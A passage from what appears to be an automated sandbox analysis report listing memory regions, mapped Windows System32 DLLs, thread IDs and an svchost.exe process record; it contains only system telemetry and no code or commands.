"\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2123 start_va = 0x7ffa11640000 end_va = 0x7ffa1167ffff monitored = 0 entry_point = 0x7ffa11651960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 2124 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2125 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2126 start_va = 0x7ffa118b0000 end_va = 0x7ffa119affff monitored = 0 entry_point = 0x7ffa118f0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 2127 start_va = 0x7ffa11a40000 end_va = 0x7ffa11a4bfff monitored = 0 entry_point = 0x7ffa11a42480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2128 start_va = 0x7ffa11b10000 end_va = 0x7ffa11b41fff monitored = 0 entry_point = 0x7ffa11b22340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2129 start_va = 0x7ffa11d80000 end_va = 0x7ffa11d8bfff monitored = 0 entry_point = 0x7ffa11d82790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2130 start_va = 0x7ffa11d90000 end_va = 0x7ffa11db3fff monitored = 0 entry_point = 0x7ffa11d93260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2131 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2132 start_va = 0x7ffa12080000 end_va = 0x7ffa120c8fff monitored = 0 entry_point = 0x7ffa1208a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2133 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2134 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2135 start_va = 0x7ffa122e0000 end_va = 0x7ffa12359fff monitored = 0 entry_point = 0x7ffa12301a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2136 start_va = 0x7ffa123a0000 end_va = 0x7ffa123d3fff monitored = 0 entry_point = 0x7ffa123bae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2137 start_va = 0x7ffa123e0000 end_va = 0x7ffa123e9fff monitored = 0 entry_point = 0x7ffa123e1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2138 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2139 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2140 start_va = 0x7ffa12710000 end_va = 0x7ffa12726fff monitored = 0 entry_point = 0x7ffa127179d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2141 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2142 start_va = 0x7ffa12870000 end_va = 0x7ffa12890fff monitored = 0 entry_point = 0x7ffa12880250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2143 start_va = 0x7ffa128c0000 end_va = 0x7ffa128f9fff monitored = 0 entry_point = 0x7ffa128c8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2144 start_va = 0x7ffa12900000 end_va = 0x7ffa12926fff monitored = 0 entry_point = 0x7ffa12910aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2145 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2146 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2147 start_va = 0x7ffa12c00000 end_va = 0x7ffa12c18fff monitored = 0 entry_point = 0x7ffa12c05e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2148 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2149 start_va = 0x7ffa12c50000 end_va = 0x7ffa12ce8fff monitored = 0 entry_point = 0x7ffa12c7f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2150 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2151 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2152 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2153 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2154 start_va = 0x7ffa12e20000 end_va = 0x7ffa12e74fff monitored = 0 entry_point = 0x7ffa12e37970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2155 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2156 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2157 start_va = 0x7ffa13110000 end_va = 0x7ffa13126fff monitored = 0 entry_point = 0x7ffa13111390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2158 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2159 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2160 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2161 start_va = 0x7ffa133e0000 end_va = 0x7ffa13465fff monitored = 0 entry_point = 0x7ffa133ed8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2162 start_va = 0x7ffa13520000 end_va = 0x7ffa13b63fff monitored = 0 entry_point = 0x7ffa136e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2163 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2164 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2165 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2166 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2167 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2168 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2169 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2170 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2171 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2172 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2173 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2174 start_va = 0x7ffa14ba0000 end_va = 0x7ffa14bf1fff monitored = 0 entry_point = 0x7ffa14baf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2175 start_va = 0x7ffa14c00000 end_va = 0x7ffa15028fff monitored = 0 entry_point = 0x7ffa14c28740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2176 start_va = 0x7ffa15030000 end_va = 0x7ffa1508bfff monitored = 0 entry_point = 0x7ffa1504b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2177 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2178 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2179 start_va = 0x7ffa15210000 end_va = 0x7ffa1676efff monitored = 0 entry_point = 0x7ffa153711f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2180 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2477 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 2599 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3322 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 11502 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Thread: id = 53 os_tid = 0xd1c Thread: id = 54 os_tid = 0xd14 Thread: id = 55 os_tid = 0xd10 Thread: id = 56 os_tid = 0xd0c Thread: id = 57 os_tid = 0xd00 Thread: id = 58 os_tid = 0xcf8 Thread: id = 59 os_tid = 0x1248 Thread: id = 60 os_tid = 0x1094 Thread: id = 61 os_tid = 0x1064 Thread: id = 62 os_tid = 0xa80 Thread: id = 63 os_tid = 0x790 Thread: id = 64 os_tid = 0xa50 Thread: id = 65 os_tid = 0x470 Thread: id = 66 os_tid = 0x860 Thread: id = 67 os_tid = 0x4f0 Thread: id = 68 os_tid = 0x78c Thread: id = 69 os_tid = 0x784 Thread: id = 70 os_tid = 0x740 Thread: id = 71 os_tid = 0x5ac Thread: id = 72 os_tid = 0x5e0 Thread: id = 73 os_tid = 0x2d4 Thread: id = 74 os_tid = 0x2d8 Thread: id = 75 os_tid = 0x17c Thread: id = 76 os_tid = 0x5c0 Thread: id = 77 os_tid = 0x9c8 Thread: id = 78 os_tid = 0x3c4 Thread: id = 79 os_tid = 0x48c Thread: id = 80 os_tid = 0x8dc Thread: id = 81 os_tid = 0x488 Thread: id = 82 os_tid = 0xf4 Thread: id = 83 os_tid = 0x380 Thread: id = 84 os_tid = 0x1d0 Thread: id = 85 os_tid = 0x18c Thread: id = 86 os_tid = 0x804 Thread: id = 87 os_tid = 0x6e4 Thread: id = 88 os_tid = 0x32c Thread: id = 89 os_tid = 0x7a0 Thread: id = 90 os_tid = 0xa1c Thread: id = 91 os_tid = 0xa88 Thread: id = 92 os_tid = 0xac4 Thread: id = 93 os_tid = 0xa98 Thread: id = 94 os_tid = 0xba8 Thread: id = 95 os_tid = 0x424 Thread: id = 96 os_tid = 0x8d8 Thread: id = 97 os_tid = 0x668 Thread: id = 98 os_tid = 0x5ec Thread: id = 99 os_tid = 0x780 Thread: id = 100 os_tid = 0x728 Thread: id = 101 os_tid = 0x508 Thread: id = 102 os_tid = 0x428 Thread: id = 103 os_tid = 0x4f8 Thread: id = 104 os_tid = 0x7e4 Thread: id = 105 os_tid = 0x7e0 Thread: id = 106 os_tid = 0x7dc Thread: id = 107 os_tid = 0x7d8 Thread: id = 108 os_tid = 0x7cc Thread: id = 109 os_tid = 0x7c4 Thread: id = 110 os_tid = 0x7b0 Thread: id = 111 os_tid = 0x788 Thread: id = 112 os_tid = 0x744 Thread: id = 113 os_tid = 0x448 Thread: id = 114 os_tid = 0x6f8 Thread: id = 115 os_tid = 0x6d4 Thread: id = 116 os_tid = 0x648 Thread: id = 117 os_tid = 0x640 Thread: id = 118 os_tid = 0x62c Thread: id = 119 os_tid = 0x530 Thread: id = 120 os_tid = 0x4a8 Thread: id = 121 os_tid = 0x2ac Thread: id = 122 os_tid = 0x270 Thread: id = 123 os_tid = 0x154 Thread: id = 124 os_tid = 0x1b8 Thread: id = 125 os_tid = 0x1bc Thread: id = 126 os_tid = 0x180 Thread: id = 127 os_tid = 0x188 Thread: id = 128 os_tid = 0x148 Thread: id = 129 os_tid = 0x12c Thread: id = 130 os_tid = 0xfc Thread: id = 131 os_tid = 0x60 Thread: id = 132 os_tid = 0x3f0 Thread: id = 133 os_tid = 0x3e8 Thread: id = 134 os_tid = 0x3cc Thread: id = 135 os_tid = 0x364 Thread: id = 164 os_tid = 0xd38 Thread: id = 174 os_tid = 0x116c Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x510bc000" os_pid = "0x390" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c87e" [0xc000000f], "LOCAL" [0x7] Region: id = 2322 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2323 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2324 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2325 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2326 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2327 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2328 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2329 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2330 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2331 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2332 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2333 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2334 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2335 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2336 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2337 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2338 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2339 start_va = 0x570000 end_va = 0x576fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2340 start_va = 0x580000 end_va = 0x5e3fff monitored = 0 entry_point = 0x595ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2341 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 2342 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2343 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2344 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2345 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2346 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 2347 start_va = 0xc20000 end_va = 0xc26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 2348 start_va = 0xc30000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 2349 start_va = 0xcb0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2350 start_va = 0xcd0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 2351 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 2352 start_va = 0xd00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 2353 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2354 start_va = 0xf00000 end_va = 0xf00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 2355 start_va = 0xf10000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 2356 start_va = 0xf90000 end_va = 0xf90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 2357 start_va = 0xfa0000 end_va = 0xfa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 2358 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 2359 start_va = 0x1120000 end_va = 0x1126fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 2360 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 2361 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2362 start_va = 0x1300000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2363 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 2364 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2365 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 2366 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2367 start_va = 0x1590000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 2368 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2369 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 2370 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 2371 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 2372 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 2373 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2374 start_va = 0x1d00000 end_va = 0x2036fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2375 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2376 start_va = 0x2140000 end_va = 0x221ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2377 start_va = 0x2220000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 2378 start_va = 